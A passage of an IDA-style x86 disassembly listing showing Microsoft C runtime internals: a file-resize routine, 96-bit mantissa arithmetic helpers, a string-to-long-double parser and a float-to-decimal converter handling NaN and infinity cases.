pop edi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E66E proc near ; CODE XREF: sub_41D55D+2BD�p
var_100C = byte ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_414800
mov eax, dword_42DEA8
xor eax, [ebp+4]
push ebx
push esi
push 1
xor esi, esi
push esi
push [ebp+arg_0]
mov [ebp+var_4], eax
call sub_41B348
or ebx, 0FFFFFFFFh
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_8], eax
jz loc_41E798
push 2
push esi
push [ebp+arg_0]
call sub_41B348
add esp, 0Ch
cmp eax, ebx
jz loc_41E798
push edi
mov edi, [ebp+arg_4]
sub edi, eax
test edi, edi
jle short loc_41E73B
mov ebx, 1000h
push ebx
lea eax, [ebp+var_100C]
push esi
push eax
call sub_41C550
push 8000h
push [ebp+arg_0]
call sub_41F241
add esp, 14h
mov [ebp+var_C], eax
loc_41E6EC: ; CODE XREF: sub_41E66E+A2�j
cmp edi, ebx
mov eax, ebx
jge short loc_41E6F4
mov eax, edi
loc_41E6F4: ; CODE XREF: sub_41E66E+82�j
push eax
lea eax, [ebp+var_100C]
push eax
push [ebp+arg_0]
call sub_41BF3B
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_41E714
sub edi, eax
test edi, edi
jg short loc_41E6EC
jmp short loc_41E72C
; ---------------------------------------------------------------------------
loc_41E714: ; CODE XREF: sub_41E66E+9C�j
call sub_419609
cmp dword ptr [eax], 5
jnz short loc_41E729
call sub_419600
mov dword ptr [eax], 0Dh
loc_41E729: ; CODE XREF: sub_41E66E+AE�j
or esi, 0FFFFFFFFh
loc_41E72C: ; CODE XREF: sub_41E66E+A4�j
push [ebp+var_C]
push [ebp+arg_0]
call sub_41F241
pop ecx
pop ecx
jmp short loc_41E783
; ---------------------------------------------------------------------------
loc_41E73B: ; CODE XREF: sub_41E66E+56�j
jge short loc_41E783
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41B348
push [ebp+arg_0]
call sub_41CD1B
add esp, 10h
push eax
call ds:dword_420134 ; SetEndOfFile
mov esi, eax
neg esi
sbb esi, esi
neg esi
dec esi
cmp esi, ebx
jnz short loc_41E783
call sub_419600
mov dword ptr [eax], 0Dh
call sub_419609
mov edi, eax
call ds:dword_420008 ; RtlGetLastWin32Error
mov [edi], eax
loc_41E783: ; CODE XREF: sub_41E66E+CB�j
; sub_41E66E:loc_41E73B�j ...
push 0
push [ebp+var_8]
push [ebp+arg_0]
call sub_41B348
add esp, 0Ch
mov eax, esi
pop edi
jmp short loc_41E79A
; ---------------------------------------------------------------------------
loc_41E798: ; CODE XREF: sub_41E66E+32�j
; sub_41E66E+48�j
mov eax, ebx
loc_41E79A: ; CODE XREF: sub_41E66E+128�j
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop esi
pop ebx
call sub_41A1F6
leave
retn
sub_41E66E endp
; =============== S U B R O U T I N E =======================================
sub_41E7A9 proc near ; CODE XREF: sub_41D8CB+23�p
; sub_41D8CB+3A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_0]
push esi
mov esi, [esp+4+arg_4]
lea ecx, [edx+esi]
xor eax, eax
cmp ecx, edx
jb short loc_41E7BF
cmp ecx, esi
jnb short loc_41E7C2
loc_41E7BF: ; CODE XREF: sub_41E7A9+10�j
xor eax, eax
inc eax
loc_41E7C2: ; CODE XREF: sub_41E7A9+14�j
mov edx, [esp+4+arg_8]
mov [edx], ecx
pop esi
retn
sub_41E7A9 endp
; =============== S U B R O U T I N E =======================================
sub_41E7CA proc near ; CODE XREF: sub_41E883+4B�p
; sub_41E883+6C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
push edi
mov edi, [esp+8+arg_4]
push esi
push dword ptr [edi]
push dword ptr [esi]
call sub_41E7A9
add esp, 0Ch
test eax, eax
jz short loc_41E7FC
lea eax, [esi+4]
push eax
push 1
push dword ptr [eax]
call sub_41E7A9
add esp, 0Ch
test eax, eax
jz short loc_41E7FC
inc dword ptr [esi+8]
loc_41E7FC: ; CODE XREF: sub_41E7CA+19�j
; sub_41E7CA+2D�j
lea eax, [esi+4]
push eax
push dword ptr [edi+4]
push dword ptr [eax]
call sub_41E7A9
add esp, 0Ch
test eax, eax
jz short loc_41E814
inc dword ptr [esi+8]
loc_41E814: ; CODE XREF: sub_41E7CA+45�j
lea eax, [esi+8]
push eax
push dword ptr [edi+8]
push dword ptr [eax]
call sub_41E7A9
add esp, 0Ch
pop edi
pop esi
retn
sub_41E7CA endp
; =============== S U B R O U T I N E =======================================
sub_41E828 proc near ; CODE XREF: sub_41E883+3B�p
; sub_41E883+41�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, [eax]
mov ecx, esi
add esi, esi
push edi
mov edi, [eax+4]
shr ecx, 1Fh
mov [eax], esi
lea esi, [edi+edi]
or esi, ecx
mov ecx, [eax+8]
mov edx, edi
shr edx, 1Fh
shl ecx, 1
or ecx, edx
pop edi
mov [eax+4], esi
mov [eax+8], ecx
pop esi
retn
sub_41E828 endp
; =============== S U B R O U T I N E =======================================
sub_41E856 proc near ; CODE XREF: sub_41EDA1+1C1�p
; sub_41F2A3+18A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov edx, [eax+8]
mov ecx, [eax+4]
push esi
push edi
mov edi, ecx
mov esi, edx
shr ecx, 1
shl esi, 1Fh
or ecx, esi
mov [eax+4], ecx
mov ecx, [eax]
shl edi, 1Fh
shr ecx, 1
or ecx, edi
shr edx, 1
pop edi
mov [eax+8], edx
mov [eax], ecx
pop esi
retn
sub_41E856 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E883 proc near ; CODE XREF: sub_41E967+362�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, dword_42DEA8
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_8]
xor edx, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
cmp eax, edx
push esi
push edi
mov [ebp+var_8], 404Eh
mov [ebx], edx
mov [ebx+4], edx
mov [ebx+8], edx
jbe short loc_41E901
mov [ebp+arg_8], eax
loc_41E8B5: ; CODE XREF: sub_41E883+7A�j
mov esi, ebx
lea edi, [ebp+var_14]
movsd
movsd
push ebx
movsd
call sub_41E828
push ebx
call sub_41E828
lea eax, [ebp+var_14]
push eax
push ebx
call sub_41E7CA
push ebx
call sub_41E828
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax]
and [ebp+var_10], 0
and [ebp+var_C], 0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
push eax
push ebx
call sub_41E7CA
add esp, 1Ch
inc [ebp+arg_0]
dec [ebp+arg_8]
jnz short loc_41E8B5
xor edx, edx
loc_41E901: ; CODE XREF: sub_41E883+2D�j
cmp [ebx+8], edx
jnz short loc_41E935
mov edi, [ebx+8]
loc_41E909: ; CODE XREF: sub_41E883+AD�j
mov ecx, [ebx+4]
add [ebp+var_8], 0FFF0h
mov eax, ecx
shr eax, 10h
mov edi, eax
mov eax, [ebx]
mov esi, eax
shr esi, 10h
shl ecx, 10h
or esi, ecx
shl eax, 10h
cmp edi, edx
mov [ebx+4], esi
mov [ebx], eax
jz short loc_41E909
mov [ebx+8], edi
loc_41E935: ; CODE XREF: sub_41E883+81�j
mov esi, 8000h
jmp short loc_41E94A
; ---------------------------------------------------------------------------
loc_41E93C: ; CODE XREF: sub_41E883+CA�j
push ebx
call sub_41E828
add [ebp+var_8], 0FFFFh
pop ecx
loc_41E94A: ; CODE XREF: sub_41E883+B7�j
test [ebx+8], esi
jz short loc_41E93C
mov ecx, [ebp+var_4]
mov ax, word ptr [ebp+var_8]
xor ecx, [ebp+4]
pop edi
pop esi
mov [ebx+0Ah], ax
pop ebx
call sub_41A1F6
leave
retn
sub_41E883 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E967 proc near ; CODE XREF: sub_41DBBD+22�p
; sub_41DC00+22�p
var_58 = byte ptr -58h
var_41 = byte ptr -41h
var_3C = dword ptr -3Ch
var_36 = dword ptr -36h
var_32 = dword ptr -32h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 58h
mov eax, dword_42DEA8
xor eax, [ebp+4]
push ebx
push esi
mov [ebp+var_4], eax
xor eax, eax
push edi
mov edi, [ebp+arg_8]
lea esi, [ebp+var_58]
mov [ebp+var_8], esi
mov [ebp+var_2C], eax
mov [ebp+var_1C], 1
mov [ebp+var_C], eax
mov [ebp+var_14], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_10], eax
mov [ebp+var_18], eax
mov [ebp+arg_8], edi
loc_41E9A8: ; CODE XREF: sub_41E967+58�j
mov cl, [edi]
cmp cl, 20h
jz short loc_41E9BE
cmp cl, 9
jz short loc_41E9BE
cmp cl, 0Ah
jz short loc_41E9BE
cmp cl, 0Dh
jnz short loc_41E9C1
loc_41E9BE: ; CODE XREF: sub_41E967+46�j
; sub_41E967+4B�j ...
inc edi
jmp short loc_41E9A8
; ---------------------------------------------------------------------------
loc_41E9C1: ; CODE XREF: sub_41E967+55�j
; sub_41E967+B5�j ...
mov bl, [edi]
inc edi
cmp eax, 0Bh ; switch 12 cases
ja loc_41EC40 ; default
; jumptable 0041E9CD case 10
jmp ds:off_41ED71[eax*4] ; switch jump
loc_41E9D4: ; DATA XREF: .text:off_41ED71�o
cmp bl, 31h ; jumptable 0041E9CD case 0
jl short loc_41E9E5
cmp bl, 39h
jg short loc_41E9E5
loc_41E9DE: ; CODE XREF: sub_41E967+CE�j
; sub_41E967+129�j
push 3
jmp loc_41EBFF
; ---------------------------------------------------------------------------
loc_41E9E5: ; CODE XREF: sub_41E967+70�j
; sub_41E967+75�j
cmp bl, byte_42E0F8
jnz short loc_41E9F4
loc_41E9ED: ; CODE XREF: sub_41E967+135�j
push 5
jmp loc_41EC36
; ---------------------------------------------------------------------------
loc_41E9F4: ; CODE XREF: sub_41E967+84�j
movsx eax, bl
sub eax, 2Bh
jz short loc_41EA1E
dec eax
dec eax
jz short loc_41EA12
sub eax, 3
jz loc_41EAAB
mov [ebp+var_8], esi
dec edi
jmp loc_41EBBD
; ---------------------------------------------------------------------------
loc_41EA12: ; CODE XREF: sub_41E967+97�j
push 2
pop eax
mov [ebp+var_2C], 8000h
jmp short loc_41E9C1
; ---------------------------------------------------------------------------
loc_41EA1E: ; CODE XREF: sub_41E967+93�j
and [ebp+var_2C], 0
push 2
pop eax
jmp short loc_41E9C1
; ---------------------------------------------------------------------------
loc_41EA27: ; CODE XREF: sub_41E967+66�j
; DATA XREF: .text:off_41ED71�o
xor eax, eax ; jumptable 0041E9CD case 1
inc eax
cmp bl, 31h
mov [ebp+var_14], eax
jl short loc_41EA37
cmp bl, 39h
jle short loc_41E9DE
loc_41EA37: ; CODE XREF: sub_41E967+C9�j
cmp bl, byte_42E0F8
jnz short loc_41EA46
loc_41EA3F: ; CODE XREF: sub_41E967+182�j
push 4
jmp loc_41EC36
; ---------------------------------------------------------------------------
loc_41EA46: ; CODE XREF: sub_41E967+D6�j
cmp bl, 2Bh
jz short loc_41EA80
cmp bl, 2Dh
jz short loc_41EA80
cmp bl, 30h
jz loc_41E9C1
loc_41EA59: ; CODE XREF: sub_41E967+1DA�j
cmp bl, 43h
jle loc_41EBB9
cmp bl, 45h
jle short loc_41EA79
cmp bl, 63h
jle loc_41EBB9
cmp bl, 65h
jg loc_41EBB9
loc_41EA79: ; CODE XREF: sub_41E967+FE�j
push 6
jmp loc_41EC36
; ---------------------------------------------------------------------------
loc_41EA80: ; CODE XREF: sub_41E967+E2�j
; sub_41E967+E7�j ...
dec edi
push 0Bh
jmp loc_41EC36
; ---------------------------------------------------------------------------
loc_41EA88: ; CODE XREF: sub_41E967+66�j
; DATA XREF: .text:off_41ED71�o
cmp bl, 31h ; jumptable 0041E9CD case 2
jl short loc_41EA96
cmp bl, 39h
jle loc_41E9DE
loc_41EA96: ; CODE XREF: sub_41E967+124�j
cmp bl, byte_42E0F8
jz loc_41E9ED
cmp bl, 30h
jnz loc_41EC0B
loc_41EAAB: ; CODE XREF: sub_41E967+9C�j
xor eax, eax
inc eax
jmp loc_41E9C1
; ---------------------------------------------------------------------------
loc_41EAB3: ; CODE XREF: sub_41E967+66�j
; DATA XREF: .text:off_41ED71�o
mov [ebp+var_14], 1 ; jumptable 0041E9CD case 3
jmp short loc_41EAD3
; ---------------------------------------------------------------------------
loc_41EABC: ; CODE XREF: sub_41E967+178�j
cmp [ebp+var_C], 19h
jnb short loc_41EACD
inc [ebp+var_C]
sub bl, 30h
mov [esi], bl
inc esi
jmp short loc_41EAD0
; ---------------------------------------------------------------------------
loc_41EACD: ; CODE XREF: sub_41E967+159�j
inc [ebp+var_10]
loc_41EAD0: ; CODE XREF: sub_41E967+164�j
mov bl, [edi]
inc edi
loc_41EAD3: ; CODE XREF: sub_41E967+153�j
movzx eax, bl
push eax
call sub_41C33B
test eax, eax
pop ecx
jnz short loc_41EABC
cmp bl, byte_42E0F8
jnz short loc_41EB2F
jmp loc_41EA3F
; ---------------------------------------------------------------------------
loc_41EAEE: ; CODE XREF: sub_41E967+66�j
; DATA XREF: .text:off_41ED71�o
xor eax, eax ; jumptable 0041E9CD case 4
inc eax
cmp [ebp+var_C], 0
mov [ebp+var_14], eax
mov [ebp+var_28], eax
jnz short loc_41EB21
jmp short loc_41EB05
; ---------------------------------------------------------------------------
loc_41EAFF: ; CODE XREF: sub_41E967+1A1�j
dec [ebp+var_10]
mov bl, [edi]
inc edi
loc_41EB05: ; CODE XREF: sub_41E967+196�j
cmp bl, 30h
jz short loc_41EAFF
jmp short loc_41EB21
; ---------------------------------------------------------------------------
loc_41EB0C: ; CODE XREF: sub_41E967+1C6�j
cmp [ebp+var_C], 19h
jnb short loc_41EB1E
inc [ebp+var_C]
sub bl, 30h
mov [esi], bl
inc esi
dec [ebp+var_10]
loc_41EB1E: ; CODE XREF: sub_41E967+1A9�j
mov bl, [edi]
inc edi
loc_41EB21: ; CODE XREF: sub_41E967+194�j
; sub_41E967+1A3�j
movzx eax, bl
push eax
call sub_41C33B
test eax, eax
pop ecx
jnz short loc_41EB0C
loc_41EB2F: ; CODE XREF: sub_41E967+180�j
cmp bl, 2Bh
jz loc_41EA80
cmp bl, 2Dh
jz loc_41EA80
jmp loc_41EA59
; ---------------------------------------------------------------------------
loc_41EB46: ; CODE XREF: sub_41E967+66�j
; DATA XREF: .text:off_41ED71�o
movzx eax, bl ; jumptable 0041E9CD case 5
push eax
mov [ebp+var_28], 1
call sub_41C33B
test eax, eax
pop ecx
jz loc_41EC0B
push 4
jmp loc_41EBFF
; ---------------------------------------------------------------------------
loc_41EB66: ; CODE XREF: sub_41E967+66�j
; DATA XREF: .text:off_41ED71�o
cmp bl, 31h ; jumptable 0041E9CD case 6
lea ecx, [edi-2]
mov [ebp+arg_8], ecx
jl short loc_41EB7A
cmp bl, 39h
jle loc_41EBFD
loc_41EB7A: ; CODE XREF: sub_41E967+208�j
movsx eax, bl
sub eax, 2Bh
jz loc_41EC34
dec eax
dec eax
jz loc_41EC28
sub eax, 3
jnz loc_41EC4E
loc_41EB97: ; CODE XREF: sub_41E967+2A2�j
push 8
jmp loc_41EC36
; ---------------------------------------------------------------------------
loc_41EB9E: ; CODE XREF: sub_41E967+66�j
; DATA XREF: .text:off_41ED71�o
mov [ebp+var_24], 1 ; jumptable 0041E9CD case 8
jmp short loc_41EBAA
; ---------------------------------------------------------------------------
loc_41EBA7: ; CODE XREF: sub_41E967+246�j
mov bl, [edi]
inc edi
loc_41EBAA: ; CODE XREF: sub_41E967+23E�j
cmp bl, 30h
jz short loc_41EBA7
cmp bl, 31h
jl short loc_41EBB9
cmp bl, 39h
jle short loc_41EBFD
loc_41EBB9: ; CODE XREF: sub_41E967+F5�j
; sub_41E967+103�j ...
dec edi
loc_41EBBA: ; CODE XREF: sub_41E967+2A7�j
; sub_41E967+2E2�j
mov [ebp+var_8], esi
loc_41EBBD: ; CODE XREF: sub_41E967+A6�j
; sub_41E967+2EC�j ...
cmp [ebp+var_14], 0
mov eax, [ebp+arg_4]
mov [eax], edi
jz loc_41ED1C
push 18h
pop eax
cmp [ebp+var_C], eax
jbe short loc_41EBE4
cmp [ebp+var_41], 5
jl short loc_41EBDD
inc [ebp+var_41]
loc_41EBDD: ; CODE XREF: sub_41E967+271�j
dec esi
inc [ebp+var_10]
mov [ebp+var_C], eax
loc_41EBE4: ; CODE XREF: sub_41E967+26B�j
cmp [ebp+var_C], 0
jbe loc_41ED43
jmp loc_41ECB8
; ---------------------------------------------------------------------------
loc_41EBF3: ; CODE XREF: sub_41E967+66�j
; DATA XREF: .text:off_41ED71�o
cmp bl, 31h ; jumptable 0041E9CD case 7
jl short loc_41EC06
cmp bl, 39h
jg short loc_41EC06
loc_41EBFD: ; CODE XREF: sub_41E967+20D�j
; sub_41E967+250�j
push 9
loc_41EBFF: ; CODE XREF: sub_41E967+79�j
; sub_41E967+1FA�j
pop eax
dec edi
jmp loc_41E9C1
; ---------------------------------------------------------------------------
loc_41EC06: ; CODE XREF: sub_41E967+28F�j
; sub_41E967+294�j
cmp bl, 30h
jz short loc_41EB97
loc_41EC0B: ; CODE XREF: sub_41E967+13E�j
; sub_41E967+1F2�j
mov edi, [ebp+arg_8]
jmp short loc_41EBBA
; ---------------------------------------------------------------------------
loc_41EC10: ; CODE XREF: sub_41E967+66�j
; DATA XREF: .text:off_41ED71�o
cmp [ebp+arg_18], 0 ; jumptable 0041E9CD case 11
jz short loc_41EC3C
movsx eax, bl
sub eax, 2Bh
lea ecx, [edi-1]
mov [ebp+arg_8], ecx
jz short loc_41EC34
dec eax
dec eax
jnz short loc_41EC4E
loc_41EC28: ; CODE XREF: sub_41E967+221�j
or [ebp+var_1C], 0FFFFFFFFh
push 7
pop eax
jmp loc_41E9C1
; ---------------------------------------------------------------------------
loc_41EC34: ; CODE XREF: sub_41E967+219�j
; sub_41E967+2BB�j
push 7
loc_41EC36: ; CODE XREF: sub_41E967+88�j
; sub_41E967+DA�j ...
pop eax
jmp loc_41E9C1
; ---------------------------------------------------------------------------
loc_41EC3C: ; CODE XREF: sub_41E967+2AD�j
push 0Ah
pop eax
dec edi
loc_41EC40: ; CODE XREF: sub_41E967+60�j
; sub_41E967+66�j
; DATA XREF: ...
cmp eax, 0Ah ; default
; jumptable 0041E9CD case 10
jnz loc_41E9C1
jmp loc_41EBBA
; ---------------------------------------------------------------------------
loc_41EC4E: ; CODE XREF: sub_41E967+22A�j
; sub_41E967+2BF�j
mov [ebp+var_8], esi
mov edi, ecx
jmp loc_41EBBD
; ---------------------------------------------------------------------------
loc_41EC58: ; CODE XREF: sub_41E967+66�j
; DATA XREF: .text:off_41ED71�o
mov [ebp+var_8], esi ; jumptable 0041E9CD case 9
mov [ebp+var_24], 1
xor esi, esi
jmp short loc_41EC7B
; ---------------------------------------------------------------------------
loc_41EC66: ; CODE XREF: sub_41E967+320�j
movsx ecx, bl
lea eax, [esi+esi*4]
lea esi, [ecx+eax*2-30h]
cmp esi, 1450h
jg short loc_41EC8B
mov bl, [edi]
inc edi
loc_41EC7B: ; CODE XREF: sub_41E967+2FD�j
movzx eax, bl
push eax
call sub_41C33B
test eax, eax
pop ecx
jnz short loc_41EC66
jmp short loc_41EC90
; ---------------------------------------------------------------------------
loc_41EC8B: ; CODE XREF: sub_41E967+30F�j
mov esi, 1451h
loc_41EC90: ; CODE XREF: sub_41E967+322�j
mov [ebp+var_20], esi
movzx eax, bl
jmp short loc_41EC9E
; ---------------------------------------------------------------------------
loc_41EC98: ; CODE XREF: sub_41E967+340�j
mov al, [edi]
inc edi
movzx eax, al
loc_41EC9E: ; CODE XREF: sub_41E967+32F�j
push eax
call sub_41C33B
test eax, eax
pop ecx
jnz short loc_41EC98
mov esi, [ebp+var_8]
dec edi
jmp loc_41EBBD
; ---------------------------------------------------------------------------
loc_41ECB2: ; CODE XREF: sub_41E967+355�j
dec [ebp+var_C]
inc [ebp+var_10]
loc_41ECB8: ; CODE XREF: sub_41E967+287�j
dec esi
cmp byte ptr [esi], 0
jz short loc_41ECB2
lea eax, [ebp+var_3C]
push eax
push [ebp+var_C]
lea eax, [ebp+var_58]
push eax
call sub_41E883
mov eax, [ebp+var_20]
xor ecx, ecx
add esp, 0Ch
cmp [ebp+var_1C], ecx
jge short loc_41ECDD
neg eax
loc_41ECDD: ; CODE XREF: sub_41E967+372�j
add eax, [ebp+var_10]
cmp [ebp+var_24], ecx
jnz short loc_41ECE8
add eax, [ebp+arg_10]
loc_41ECE8: ; CODE XREF: sub_41E967+37C�j
cmp [ebp+var_28], ecx
jnz short loc_41ECF0
sub eax, [ebp+arg_14]
loc_41ECF0: ; CODE XREF: sub_41E967+384�j
cmp eax, 1450h
jg short loc_41ED25
cmp eax, 0FFFFEBB0h
jl short loc_41ED3C
push [ebp+arg_C]
push eax
lea eax, [ebp+var_3C]
push eax
call sub_41F4DB
mov edx, [ebp+var_3C]
mov ebx, [ebp+var_3C+2]
mov esi, [ebp+var_36]
mov eax, [ebp+var_32]
add esp, 0Ch
jmp short loc_41ED4B
; ---------------------------------------------------------------------------
loc_41ED1C: ; CODE XREF: sub_41E967+25F�j
mov [ebp+var_18], 4
jmp short loc_41ED43
; ---------------------------------------------------------------------------
loc_41ED25: ; CODE XREF: sub_41E967+38E�j
xor ebx, ebx
mov eax, 7FFFh
mov esi, 80000000h
xor edx, edx
mov [ebp+var_18], 2
jmp short loc_41ED4B
; ---------------------------------------------------------------------------
loc_41ED3C: ; CODE XREF: sub_41E967+395�j
mov [ebp+var_18], 1
loc_41ED43: ; CODE XREF: sub_41E967+281�j
; sub_41E967+3BC�j
xor edx, edx
xor eax, eax
xor esi, esi
xor ebx, ebx
loc_41ED4B: ; CODE XREF: sub_41E967+3B3�j
; sub_41E967+3D3�j
mov ecx, [ebp+arg_0]
or eax, [ebp+var_2C]
mov [ecx+2], ebx
mov [ecx+6], esi
mov [ecx+0Ah], ax
mov eax, [ebp+var_18]
mov [ecx], dx
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
pop edi
pop esi
pop ebx
call sub_41A1F6
leave
retn
sub_41E967 endp
; ---------------------------------------------------------------------------
off_41ED71 dd offset loc_41E9D4 ; DATA XREF: sub_41E967+66�r
dd offset loc_41EA27 ; jump table for switch statement
dd offset loc_41EA88
dd offset loc_41EAB3
dd offset loc_41EAEE
dd offset loc_41EB46
dd offset loc_41EB66
dd offset loc_41EBF3
dd offset loc_41EB9E
dd offset loc_41EC58
dd offset loc_41EC40
dd offset loc_41EC10
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EDA1 proc near ; CODE XREF: sub_41DD74+36�p
var_30 = byte ptr -30h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = byte ptr -20h
var_1F = byte ptr -1Fh
var_1E = byte ptr -1Eh
var_1D = byte ptr -1Dh
var_1C = byte ptr -1Ch
var_1B = byte ptr -1Bh
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = word ptr -18h
var_16 = dword ptr -16h
var_12 = dword ptr -12h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, dword_42DEA8
xor eax, [ebp+4]
push ebx
mov ebx, [ebp+arg_14]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
push esi
mov ecx, eax
mov esi, 7FFFh
and ecx, 8000h
and eax, esi
test cx, cx
push edi
mov [ebp+var_24], 0CCh
mov [ebp+var_23], 0CCh
mov [ebp+var_22], 0CCh
mov [ebp+var_21], 0CCh
mov [ebp+var_20], 0CCh
mov [ebp+var_1F], 0CCh
mov [ebp+var_1E], 0CCh
mov [ebp+var_1D], 0CCh
mov [ebp+var_1C], 0CCh
mov [ebp+var_1B], 0CCh
mov [ebp+var_1A], 0FBh
mov [ebp+var_19], 3Fh
mov [ebp+var_8], 1
mov edx, eax
jz short loc_41EE0E
mov byte ptr [ebx+2], 2Dh
jmp short loc_41EE12
; ---------------------------------------------------------------------------
loc_41EE0E: ; CODE XREF: sub_41EDA1+65�j
mov byte ptr [ebx+2], 20h
loc_41EE12: ; CODE XREF: sub_41EDA1+6B�j
test dx, dx
mov edi, [ebp+arg_4]
jnz short loc_41EE27
test edi, edi
jnz short loc_41EE27
cmp [ebp+arg_0], edi
jz loc_41EF1A
loc_41EE27: ; CODE XREF: sub_41EDA1+77�j
; sub_41EDA1+7B�j
cmp dx, si
jnz short loc_41EEA4
mov eax, 80000000h
cmp edi, eax
mov word ptr [ebx], 1
jnz short loc_41EE40
cmp [ebp+arg_0], 0
jz short loc_41EE4F
loc_41EE40: ; CODE XREF: sub_41EDA1+97�j
test edi, 40000000h
jnz short loc_41EE4F
push offset a1Snan ; "1#SNAN"
jmp short loc_41EE95
; ---------------------------------------------------------------------------
loc_41EE4F: ; CODE XREF: sub_41EDA1+9D�j
; sub_41EDA1+A5�j
test cx, cx
jz short loc_41EE69
cmp edi, 0C0000000h
jnz short loc_41EE69
cmp [ebp+arg_0], 0
jnz short loc_41EE90
push offset a1Ind ; "1#IND"
jmp short loc_41EE78
; ---------------------------------------------------------------------------
loc_41EE69: ; CODE XREF: sub_41EDA1+B1�j
; sub_41EDA1+B9�j
cmp edi, eax
jnz short loc_41EE90
cmp [ebp+arg_0], 0
jnz short loc_41EE90
push offset a1Inf ; "1#INF"
loc_41EE78: ; CODE XREF: sub_41EDA1+C6�j
lea eax, [ebx+4]
push eax
call sub_419C40
mov byte ptr [ebx+3], 5
loc_41EE85: ; CODE XREF: sub_41EDA1+101�j
and [ebp+var_8], 0
pop ecx
pop ecx
jmp loc_41EFFC
; ---------------------------------------------------------------------------
loc_41EE90: ; CODE XREF: sub_41EDA1+BF�j
; sub_41EDA1+CA�j ...
push offset a1Qnan ; "1#QNAN"
loc_41EE95: ; CODE XREF: sub_41EDA1+AC�j
lea eax, [ebx+4]
push eax
call sub_419C40
mov byte ptr [ebx+3], 6
jmp short loc_41EE85
; ---------------------------------------------------------------------------
loc_41EEA4: ; CODE XREF: sub_41EDA1+89�j
movzx eax, dx
mov esi, eax
imul eax, 4D10h
and [ebp+var_18], 0
mov ecx, edi
shr ecx, 18h
shr esi, 8
lea ecx, [esi+ecx*2]
imul ecx, 4Dh
lea esi, [ecx+eax-134312F4h]
mov eax, [ebp+arg_0]
mov [ebp+var_16], eax
sar esi, 10h
movsx eax, si
neg eax
push 1
push eax
lea eax, [ebp+var_18]
push eax
mov [ebp+var_E], dx
mov [ebp+var_12], edi
call sub_41F4DB
add esp, 0Ch
cmp [ebp+var_E], 3FFFh
jb short loc_41EF05
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18]
push eax
inc esi
call sub_41F2A3
pop ecx
pop ecx
loc_41EF05: ; CODE XREF: sub_41EDA1+152�j
test [ebp+arg_10], 1
mov edi, [ebp+arg_C]
mov [ebx], si
jz short loc_41EF23
movsx eax, si
add edi, eax
test edi, edi
jg short loc_41EF23
loc_41EF1A: ; CODE XREF: sub_41EDA1+80�j
mov byte ptr [ebx+4], 30h
jmp loc_41F020
; ---------------------------------------------------------------------------
loc_41EF23: ; CODE XREF: sub_41EDA1+16E�j
; sub_41EDA1+177�j
cmp edi, 15h
jle short loc_41EF2B
push 15h
pop edi
loc_41EF2B: ; CODE XREF: sub_41EDA1+185�j
movzx esi, [ebp+var_E]
sub esi, 3FFEh
and [ebp+var_E], 0
mov [ebp+arg_8], 8
loc_41EF41: ; CODE XREF: sub_41EDA1+1AD�j
lea eax, [ebp+var_18]
push eax
call sub_41E828
dec [ebp+arg_8]
pop ecx
jnz short loc_41EF41
test esi, esi
jge short loc_41EF6B
neg esi
and esi, 0FFh
jle short loc_41EF6B
loc_41EF5E: ; CODE XREF: sub_41EDA1+1C8�j
lea eax, [ebp+var_18]
push eax
call sub_41E856
dec esi
pop ecx
jnz short loc_41EF5E
loc_41EF6B: ; CODE XREF: sub_41EDA1+1B1�j
; sub_41EDA1+1BB�j
lea ecx, [edi+1]
test ecx, ecx
lea eax, [ebx+4]
mov [ebp+arg_8], eax
jle short loc_41EFC8
mov [ebp+var_C], ecx
loc_41EF7B: ; CODE XREF: sub_41EDA1+222�j
lea esi, [ebp+var_18]
lea edi, [ebp+var_30]
movsd
movsd
lea eax, [ebp+var_18]
push eax
movsd
call sub_41E828
